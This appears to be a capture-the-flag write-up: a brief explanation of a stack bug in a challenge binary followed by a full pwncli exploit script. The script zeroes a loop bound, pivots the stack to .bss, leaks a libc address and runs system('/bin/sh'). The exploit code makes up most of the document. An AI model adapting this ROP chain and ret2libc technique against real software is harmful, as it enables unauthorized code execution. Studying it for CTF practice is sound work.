Summary

Although the bytes of the supplied ROP chain are swapped at random, the loop bound lives on the stack. By writing the large region in front of the chain as zeros, one of the swaps eventually sets the loop bound to 0, which exits the loop and leaves the rest of the ROP chain untouched.
EXP
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *

# pwncli's cli_script() parses the command line and fills `gift`
# with the io tube, the target ELF and the libc ELF
cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

# writable scratch area in .bss, used as the fake stack for the pivot
bss_addr = elf.bss(0x800)

# Stage 1: 0x60 zero bytes so that one of the random swaps zeroes the
# loop bound; then read the next chain into .bss and pivot into it
s(b"\x00" * 0x60 + flat({
    8: [
        bss_addr,
        0x804865c,  # read 80 bytes
        0x804867d,  # leave; ret
        bss_addr
    ]
}, length=0x20))

# Stage 2 (runs from .bss): leak the libc address of read via
# write(1, got.read, 4), then read the final chain into .bss again
s(flat([
    bss_addr + 0x100,  # fake ebp
    elf.plt.write,
    0x804879d,  # pppr: pop; pop; pop; ret
    1, elf.got.read, 4,
    0x804865c,  # read 80 bytes
    0,
    bss_addr
]))

# compute the libc base from the leaked address of read
set_current_libc_base_and_log(recv_current_libc_addr(offset=libc.sym.read), 0)

# Stage 3: system("/bin/sh") placed at offset 28 of the buffer
s(flat({
    28: [
        libc.sym.system,
        'dead',  # return address for system, never used
        next(libc.search(b"/bin/sh"))
    ]
}))
ia()
References

1. My Blog
2. Ctf Wiki
3. pwncli